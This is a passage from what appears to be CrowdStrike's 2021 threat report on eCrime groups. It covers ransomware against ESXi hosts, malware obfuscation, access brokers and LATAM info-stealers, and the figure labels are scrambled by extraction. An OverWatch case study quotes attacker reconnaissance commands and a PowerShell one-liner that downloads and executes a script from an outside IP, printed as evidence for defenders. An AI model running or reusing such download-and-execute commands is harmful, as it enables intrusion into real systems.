WIZARD SPIDER’s inclusion of ADVObfuscator into the group’s malware Anchor, BazarLoader and Conti to enable string obfuscation. In mid-2020, WIZARD SPIDER also implemented the use of the open-source tool obfuscator-llvm for code obfuscation in samples of BazarLoader. A similar methodology was incorporated into MUMMY SPIDER’s Emotet malware delivery platform. The use of obfuscation techniques in malware is not new, but the inclusion of open- source tools into build processes is an interesting tactic that supports advanced adversaries seeking ways to keep their development processes agile. WIZARD SPIDER has likely adopted rapid development cycles to adapt to open-source reporting on their malware. Moving from custom obfuscation techniques to more standardized tooling would support more frequent changes to their toolset. Although these tools are widely available, they can be complex to set up and often require a level of automated processes. For this reason, this tactic may not be widely adopted by less sophisticated threat groups. That said, more mature adversaries may look to this method as a way to protect and obfuscate their malicious payloads. The use of ADVObfuscator has also been observed in the ransomware variants LockBit and SunCrypt.
2021 Global Threat Report CrowdStrike 26 Targeting Virtualization Infrastructure In 2020, CrowdStrike Intelligence observed both SPRITE SPIDER (the operators of Defray777) and CARBON SPIDER (the operators of DarkSide) deploy Linux versions of their respective ransomware families on ESXi hosts during BGH operations. While ransomware for Linux has existed for many years, BGH actors have historically not targeted Linux, much less ESXi specifically. ESXi is a type of hypervisor that runs on dedicated hardware and manages multiple virtual machines (VMs). With more organizations migrating to virtualization solutions to consolidate legacy IT systems, this is a natural target for ransomware operators looking to increase the impact against a victim. All identified incidents were enabled by the acquisition of valid credentials. In four separate Defray777 incidents, SPRITE SPIDER used administrator credentials to log in through the vCenter web interface. In one instance, SPRITE SPIDER likely used the PyXie remote access trojan (RAT) LaZagne module to harvest vCenter administrator credentials stored in a web browser. By targeting these hosts, ransomware operators are able to quickly encrypt multiple systems with relatively few actual ransomware deployments. Encrypting one ESXi server inflicts the same amount of damage as individually deploying ransomware on each VM hosted on a given server. Consequently, targeting ESXi hosts can also improve the speed of BGH operations. Additionally, due to their lack of conventional operating systems, ESXi hosts lack endpoint protection software that could prevent or detect ransomware attacks. Targeted eCrime Moves to BGH By far the most relevant factor influencing targeted eCrime in 2020 is the efficacy of ransomware operations. CARBON SPIDER dramatically overhauled their operations in 2020. In April 2020, the adversary abruptly shifted from narrow campaigns focused entirely on companies operating POS devices to broad, indiscriminate operations attempting to infect large numbers of victims across all sectors. The goal of these campaigns was to deliver PINCHY SPIDER’s REvil RaaS. CARBON SPIDER deepened their commitment to BGH in August 2020 by using their own ransomware, DarkSide. In November 2020, the adversary took another step into the world of BGH by establishing a RaaS-affiliate program for DarkSide, allowing other actors to use the ransomware while paying CARBON SPIDER a cut. CARBON SPIDER’s shift away from POS campaigns exemplifies a broader trend of targeted eCrime actors shifting targets to focus on BGH. For instance, ANTHROPOID SPIDER, which in 2019 targeted financials, conducted opportunistic web server exploitation campaigns in 2020 that primarily delivered MedusaLocker ransomware. After February 2020, major adversaries COBALT SPIDER and WHISPER SPIDER apparently ceased spear-phishing activity against banks. It is likely that actors associated with both COBALT SPIDER and WHISPER SPIDER remain involved in eCrime but have chosen other ways to generate income. Targeted eCrime has not ceased, however; emerging threats in 2020 included KNOCKOUT SPIDER and SOLAR SPIDER. KNOCKOUT SPIDER has conducted low- volume spear-phishing campaigns focused on companies involved in cryptocurrency. SOLAR SPIDER’s phishing campaigns deliver the JSOutProx RAT to financial institutions across Africa, the Middle East, South Asia and Southeast Asia.
2021 Global Threat Report CrowdStrike 27 WIZARD SPIDER Continues Prolific Operations WIZARD SPIDER was the most reported criminal adversary for the second year in a row. Although activity from this adversary was slow and sporadic in the first quarter of 2020, they progressively ramped up operations beginning in the second quarter and through the remainder of the year. Their diverse and potent toolset makes this criminal group one of the most formidable adversaries in the current eCrime landscape. CrowdStrike Intelligence has observed WIZARD SPIDER increase their sector targeting scope in 2020, particularly through the operation of Conti. eCrime Reporting by Adversary WIZARD SPIDER PINCHY SPIDER CARBON SPIDER TWISTED SPIDER GRACEFUL SPIDER MUMMY SPIDER DOPPEL SPIDER VIKING SPIDER SPRITE SPIDER TRAVELING SPIDER Figure 6. eCrime Reporting by Adversary in 2020 WICKED PANDA CIRCUIT PANDA WIZARD SPIDER has maintained and forged powerful third-party relationships that PIRATE PANDA bolster the initial access capabilities — for example, their continued relationship JUDGMENT PANDA with MUMMY SPIDER. They have updated their tooling and KRYPTONITE processes in 2020, PANDA implementing obfuscation tools into their malware build processes WICKED SPIDER and adopting commodity tooling. These changes were almost DEEPcertainly PANDA implemented to circumvent static detection and in response to open-source reporting EMISSARY focused on TrickBot and PANDA WIZARD SPIDER’s ransomware variants RyukGOBLIN and Conti. PANDA KARMA PANDA Academic Manufacturing Government Telecommunications Computer Gaming Technology
2021 Global Threat Report CrowdStrike 28 OverWatch Feature WIZARD SPIDER Targets Financial Institution During the first quarter of 2020, OverWatch identified a suspected eCrime attack against a financial institution. OverWatch threat hunters’ deep analysis of this intrusion played a pivotal role in providing greater insights into a complex threat landscape where eCrime adversaries are increasingly improving their tradecraft. ADVERSARY LAUNCHES HIDDEN COMMAND SHELL During the course of routine hunting, OverWatch uncovered unusual behavior stemming from a running svchost.exe process on a Windows domain controller. A suspicious, reflectively loaded dynamic link library (DLL) launched within the svchost.exe netsvcs group and connected to the adversary-controlled domain statsgdoubleclick[.]net. Within minutes, OverWatch identified that a hidden interactive command shell had spawned under the svchost.exe process, further indicating that a malicious implant was running on the system. ADVERSARY DOUBLES DOWN ON ATTEMPT TO ACCESS THE VICTIM ENVIRONMENT The hidden shell led to interactive, hands-on execution of various host and network discovery commands. Among the reconnaissance actions were efforts to enumerate DNS and other network infrastructure, with the likely intention of preparing for lateral movement. Such commands included: arp -a dnscmd /enumzones dnscmd /zoneprint [REDACTED] nbtstat -A 1 [REDACTED] net sessions net view nltest /domain_trusts The victim did not perform an immediate and thorough response. Days later, the adversary returned and attempted to execute unknown PowerShell scripts from an external remote server: powershell.exe -nop $p=4484;[System.Net.ServicePointManager]::ServerCertificateValidation Callback={$true};iex(New-Object System.Net.WebClient).DownloadString('https://185.180.197[.]59/msys')
2021 Global Threat Report CrowdStrike 29 OverWatch Feature To run these commands, the adversary used another interactive shell facilitated by the same previously identified implant running within the svchost.exe netsvcs group. The Falcon platform’s prevention settings ensured that the PowerShell scripts failed to execute properly. This led to the adversary attempting to diagnose their failure using the following commands: wmic process where name="svchost.exe" get processid,name,commandline,sessionid,creationdate tasklist /v After these failed attempts, the adversary gave up, likely leaving with hopes of finding an easier target. CONCLUSIONS AND RECOMMENDATIONS Further analysis of all command-and-control activity involved in this latest intrusion identified commonalities with known WIZARD SPIDER infrastructure. Regardless of the adversary’s identity, defenders should pursue measures to prevent similar attacks. This includes monitoring unusual behavior from svchost.exe instances, in particular the presence of suspicious DLLs leveraging svchost.exe to make unusual network connections to external infrastructure. Defenders should also consider monitoring for bursts of extensive network configuration discovery commands occurring on hosts or under user accounts where such behavior is unexpected. Given the popularity of using PowerShell for post-exploitation command execution, another recommendation is monitoring for atypical PowerShell processes connecting to external IPs or domains.
2021 Global Threat Report CrowdStrike 30 eCrime Enablers E nablers are a pivotal part of the eCrime ecosystem, providing criminal actors with capabilities they may otherwise not have access to. These actors run malware-as-a-service operations, specialize in delivery mechanisms or exploit networks in order to sell initial access to other criminal actors. The relationships depicted in Figure 7 show that eCrime adversaries are not averse to working with, or purchasing from, other actors in order to enhance their own campaigns, maximize profitability and increase the possibility of their success. The downloader Amadey Loader and SMOKY SPIDER’s Smoke Bot remain popular among a variety of actors. NARWHAL SPIDER’s Cutwail v2 spambot was heavily utilized by DOPPEL SPIDER, and MUMMY SPIDER’s Emotet was leveraged by MALLARD SPIDER and WIZARD SPIDER. The banking trojan Zloader re-emerged, supporting campaigns operated by sophisticated BGH adversaries. TWISTED SPIDER Maze QakBot MUMMY SPIDER SPRITE SPIDER Defray777 BazarLoader Egregor MALLARD SPIDER Emotet LUNAR SPIDER BokBot Anchor ProLock DoppelDridex TrickBot WIZARD SPIDER Sidoh DoppelPaymer DOPPEL SPIDER Amadey Loader Zloader MagneticScraper SCULLY SPIDER DanaBot Cutwail v2 CARBON SPIDER Darkside RaaS Conti SMOKY SPIDER Smoke Bot Pushdo NARWHAL SPIDER REvil RaaS PINCHY SPIDER Ryuk Operates Distributed Likely Sold Develops Affiliate Of Likely Previous Access To Operates Collaboration Figure 7. Observed eCrime Relationships in 2020
2021 Global Threat Report CrowdStrike 31 1 Services 2 Distribution DDoS attack tools eCrime ecosystem Social network and Exploit kit Spam email Purchasing traffic Access brokers instant message spam development distribution and/or traffic ↘ distribution systems (TDS) Anonymity A tectonic shift toward big and encryption game hunting has been felt Hardware for sale across the entire eCrime ecosystem. Ransom payments and data extortion became the 3 Monetization most popular avenues for monetization in 2020. ↘ Phishing kits Crime-as-a-Service While many established criminal actors still operate out of Russia and Eastern Europe, the com- Ransomware plete ecosystem is truly global, with newly uncovered market- places arising and maturing in Credit/debit card Money mule Reshipping Latin America, Asia, Middle East fraud testing services and cashing and Africa. networks services ↘ Many criminal actors develop relationships within the ecosys- tem to acquire access to Loaders essential technology that enables their operations or maximizes their profits. Counter anti-virus Malware ↘ packing services service/checkers Although the methods used for Collection and sale of Money Ranstom malware distribution largely Dump shops payment card information payments laundering & extortion remain the same, criminal actors are finding novel ways to bypass security measures. Hosting & ↘ . infrastructure Recruiting for Cryptocurrency Wire services Webinject kits criminal groups fraud
2021 Global Threat Report CrowdStrike 32 Banking Trojan Operators Continue to Evolve Their Operational Model As noted, access brokers focus primarily on providing varying levels of access for sale on criminal forums. In keeping with this trend, CrowdStrike Intelligence observed criminal adversaries that traditionally operate banking trojans providing third-party access as well. Although LUNAR SPIDER has previously been known to offer malware distribution, recent BokBot infections have led directly to hands- on-keyboard activity rather than deploying malware. LUNAR SPIDER has been observed supporting SPRITE SPIDER Defray777 campaigns but likely supports other BGH adversaries. MALLARD SPIDER is also likely acting as an access broker for BGH ransomware operators. There have been multiple instances in which QakBot infections have led to the deployment of ransomware, including Egregor, Maze, DoppelPaymer, MedusaLocker and ProLock. Given that MALLARD SPIDER has historically been an insular group, they are likely selling access to these ransomware operators through private channels. Region Highlight: LATAM-Origin eCrime During 2020, CrowdStrike Intelligence tracked multiple variants of information- stealing malware originating from Latin America (LATAM) and likely developed by LATAM-based eCrime actors. These malware families include Culebra Variant, Salve, Caiman and Kiron. The malware is available to purchase on underground forums, resulting in its operation by multiple criminal actors. The most popular infection vector has been spam campaigns that rely on social engineering techniques to encourage interaction with hyperlinks in the email body, often using lure content with a financial or COVID-19-related theme. Though traditionally observed targeting entities within LATAM countries, the campaigns occasionally expanded to Spain or Portugal, often repurposing the same Spanish- or Portuguese-language content as the original LATAM-focused campaign. During 2020, CrowdStrike Intelligence observed the use of new lure content and languages, including French and Italian. It is likely that, having established their TTPs, these eCrime actors are now expanding their focus to European countries. Ultimately, a successful infection relies on the victim interacting with the email and its malicious content, so tailoring the email to the language of the target country and using emotive themes improve infection rates.
You can also read